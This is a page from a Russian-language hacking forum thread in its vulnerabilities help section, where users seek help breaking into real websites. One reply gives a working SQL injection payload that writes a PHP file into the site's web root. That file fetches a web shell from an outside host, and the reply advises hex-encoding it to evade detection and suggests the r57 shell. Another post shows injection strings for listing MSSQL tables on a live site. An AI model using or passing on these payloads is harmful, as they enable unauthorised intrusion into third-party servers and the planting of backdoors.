ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 463 из 1393 « Первая < 363413453 459 460 461 462 463 464 465 466 467 473513563963 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4621  
Старый 12.01.2009, 09:20
Basilio
Новичок
Регистрация: 13.12.2008
Сообщений: 15
Провел на форуме:
89396

Репутация: 2
По умолчанию
Помогите, пожалуйста, с заливкой шелла.

Есть сайт на дедике, на дедике установлена Windows Server 2003.
Есть MySQL 4 версии, раскрученная.
Есть путь вида: M:\Inetpub\vhosts\[SITE]\httpdocs\script.php - он выводится при ошибке скули.
Есть привилегии типа File_Priv

Будет неплохо, если набросаете хороших faq или статей. Те, что гуглил я не помогли. Желательно расписать очень подробно. с Linux только начинаю дружить.

Заранее спасиб.
Последний раз редактировалось Basilio; 12.01.2009 в 09:24..
 

  #4622  
Старый 12.01.2009, 09:45
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
Basilio
Цитата:
union select 1,<?php copy("http://tvoi.site/shell.txt","./shell.php"); ?>,3 from mysql.user into outfile 'M:\Inetpub\vhosts\[SITE]\httpdocs\scr.php'/*
Потом переходишь на scr.php, и шелл копируется в shell.php

p.s: php код лучше в hex перевести
 

  #4623  
Старый 12.01.2009, 10:07
Basilio
Новичок
Регистрация: 13.12.2008
Сообщений: 15
Провел на форуме:
89396

Репутация: 2
По умолчанию
Цитата:
Сообщение от aka PSIH  
Basilio

Потом переходишь на scr.php, и шелл копируется в shell.php

p.s: php код лучше в hex перевести
а какой шелл лучше использовать (кинь линк), конфигурацию я написал.
Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?
 

  #4624  
Старый 12.01.2009, 10:12
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию
Цитата:
Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?
Я вроде видел кроме.
 

  #4625  
Старый 12.01.2009, 10:12
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
Цитата:
а какой шелл лучше использовать
ну r57 попробуй (google.com)

Цитата:
Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха
)) тебе какой шелл то нужен?
на милворме вообще шеллов нет...
 

  #4626  
Старый 12.01.2009, 11:32
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148

Репутация: 13
По умолчанию
лююддии help me
Есть скуль на сайте
база MSSQL
ввожу
index.cfm?page=search&searchstring1-222-1933email@address.tst&searchtype=@@version или (select+system_user)
все нормально выводит
но как только пытаюсь вывести имена таблиц,
(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATIO N_SCHEMA.TABLES)
то просто открывается страница сайта, не каких ошибок и прочего
если так
(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATIO N_SCHEMA.TABLES)--
то ошибка Incorrect syntax near the keyword 'order'.

В чем трабла? как вывести имена таблиц и колонок?
 

  #4627  
Старый 12.01.2009, 11:36
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Ссылку в студию.
 

  #4628  
Старый 12.01.2009, 12:03
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию
Цитата:
Сообщение от a1ex  
Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно.
вывод ошибок остался
 

  #4629  
Старый 12.01.2009, 13:14
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию
Цитата:
Сообщение от R1dex  
Пробуй крутить, как слепую.

SQL injection полный FAQ

SQL инъекция (в т.ч. и blind SQL)
всё, порешал спасибо. просто перед id=1302 нада біло поставить `-` id=-1302
 

  #4630  
Старый 12.01.2009, 13:39
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Цитата:
Сообщение от vakula  
всё, порешал спасибо. просто перед id=1302 нада біло поставить `-` id=-1302
Я в начале так и предлагал сделать, ну да ладно.
 
 
Страница 463 из 1393 « Первая < 363413453 459 460 461 462 463 464 465 466 467 473513563963 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ